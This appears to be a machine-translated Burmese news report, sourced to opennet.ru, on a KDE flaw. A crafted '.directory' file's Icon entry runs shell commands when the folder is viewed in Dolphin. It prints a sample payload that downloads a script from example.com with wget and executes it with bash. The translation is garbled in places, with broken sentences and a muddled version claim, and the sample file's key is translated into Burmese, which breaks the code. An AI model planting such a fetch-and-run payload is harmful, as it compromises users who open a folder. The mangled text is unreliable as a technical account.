ဖိုင်များစာရင်းကို ကြည့်သောအခါ KDE ကုဒ် အကောင်အထည်ဖော်မှု အားနည်းချက်

KDE တွင် ဖော်ထုတ်ခဲ့သည်။ အားနည်းချက်အသုံးပြုသူတစ်ဦးသည် အထူးဒီဇိုင်းထုတ်ထားသည့် “.desktop” နှင့် “.directory” ဖိုင်များပါရှိသော လမ်းညွှန် သို့မဟုတ် မှတ်တမ်းကို ကြည့်ရှုသည့်အခါ တိုက်ခိုက်သူတစ်ဦးအား မတရားသောအမိန့်ပေးချက်များကို လုပ်ဆောင်ခွင့်ပြုသည်။ တိုက်ခိုက်မှုတစ်ခုတွင် အသုံးပြုသူသည် Dolphin ဖိုင်မန်နေဂျာရှိ ဖိုင်စာရင်းကို ရိုးရိုးရှင်းရှင်းကြည့်ရှုရန်၊ အန္တရာယ်ရှိသော desktop ဖိုင်ကို ဒေါင်းလုဒ်လုပ်ရန်၊ သို့မဟုတ် ဖြတ်လမ်းလင့်ခ်တစ်ခုကို desktop ပေါ် သို့မဟုတ် စာရွက်စာတမ်းတစ်ခုသို့ ဆွဲယူရန် လိုအပ်သည်။ လက်ရှိထုတ်ဝေနေသော စာကြည့်တိုက်များတွင် ပြဿနာက ထင်ရှားသည်။ KDE မူဘောင် ၅.၄၂ ဗားရှင်းအဟောင်းများနှင့် KDE 4 အထိဖြစ်သည်။ အားနည်းချက်မှာ ရှိနေဆဲဖြစ်သည်။ ကျန်နေပါသည်။ မမှန်ပါ။ (CVE မသတ်မှတ်ထားပါ)။

ပြဿနာသည် KDesktopFile အတန်းအစား မှားယွင်းစွာ အကောင်အထည်ဖော်ခြင်းကြောင့် ဖြစ်ရခြင်းဖြစ်ပြီး၊ ၎င်းသည် "Icon" variable ကို မှန်ကန်စွာ လွတ်မြောက်ခြင်းမရှိဘဲ လုပ်ဆောင်သောအခါ၊ ၎င်းသည် တန်ဖိုးကို KConfigPrivate::expandString() လုပ်ဆောင်ခြင်းအပါအဝင် shell အထူးဇာတ်ကောင်များကို ချဲ့ထွင်လုပ်ဆောင်ပေးသည့် လုပ်ဆောင်ချက်တစ်ခုကြောင့် ဖြစ်ပေါ်လာခြင်းဖြစ်သည်။ လုပ်ဆောင်ရမည့် အမိန့်များအဖြစ် “$(..)” ဟူသော စာကြောင်းများ။ XDG သတ်မှတ်ချက်များ၏ လိုအပ်ချက်များနှင့် ဆန့်ကျင်ဘက်၊ အကောင်အထည်ဖော်ခြင်း။ ထုတ်ဖော် shell constructs များသည် ဆက်တင်အမျိုးအစားကို ခွဲခြားခြင်းမရှိဘဲ ထုတ်လုပ်ထားသည်၊ i.e. အပလီကေးရှင်း၏ အမိန့်ပေးစာကြောင်းကို သတ်မှတ်သည့်အခါသာမက ပုံမှန်အားဖြင့် ပြသထားသည့် အိုင်ကွန်များကို သတ်မှတ်သည့်အခါလည်း ဖြစ်သည်။

ဥပမာအားဖြင့် တိုက်ခိုက်ရန် လုံလောက်စွာ “.directory” ကဲ့သို့သော “.directory” ဖိုင်ပါရှိသော လမ်းညွှန်တစ်ခုပါရှိသော ဇစ်မှတ်တမ်းကို သုံးစွဲသူအား ပေးပို့ပါ-

[Desktop Entry] Type=Directory
အိုင်ကွန်[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Dolphin ဖိုင်မန်နေဂျာရှိ archive ၏ အကြောင်းအရာများကို သင်ကြည့်ရှုရန် ကြိုးစားသောအခါ၊ script https://example.com/FILENAME.sh ကို ဒေါင်းလုဒ်လုပ်ပြီး လုပ်ဆောင်ပါမည်။


source: opennet.ru

မှတ်ချက် Add